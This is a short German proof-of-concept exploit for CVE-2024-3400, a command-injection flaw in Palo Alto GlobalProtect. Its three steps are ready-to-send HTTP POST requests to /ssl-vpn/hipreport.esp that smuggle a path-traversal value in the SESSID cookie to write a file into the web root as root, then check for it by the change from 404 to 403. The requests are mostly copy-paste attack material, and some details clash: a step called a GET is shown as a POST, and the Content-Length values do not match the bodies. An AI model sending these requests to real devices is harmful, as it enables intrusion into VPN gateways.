
Proof-of-concept-Exploit für CVE-2024-3400, eine Befehlsinjektionssicherheitslücke in Palo Alto GlobalProtect, die das Hochladen und Verifizieren von Dateien durch manipulierte HTTP-Anfragen demonstriert.
#Schritte :
#1. Überprüfen, ob die Datei (0xr2r.txt) auf dem Gerät vorhanden ist, indem Sie die folgende GET-Anfrage ausführen, oder wir können dies überprüfen, indem Sie die URL im Browser öffnen
https://domain.com/global-protect/portal/images/0xr2r.txt URL im Browser Wenn Sie eine 404-Antwort erhalten, bedeutet dies, dass die Datei nicht vorhanden ist.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#2. Legen Sie die Datei (0xr2r.txt) auf dem Gerät ab, indem Sie die folgende POST-Anfrage ausführen. Dies erstellt die Datei auf dem Gerät unter dem angegebenen Pfad mit Root-Zugriff.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
#3. Wenn Sie nun erneut versuchen, auf die Dateien zuzugreifen, sollten Sie 403 statt 404 erhalten. Dies beweist, dass die Datei (0xr2r.txt) auf dem Gerät mit Root-Zugriff vorhanden ist.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r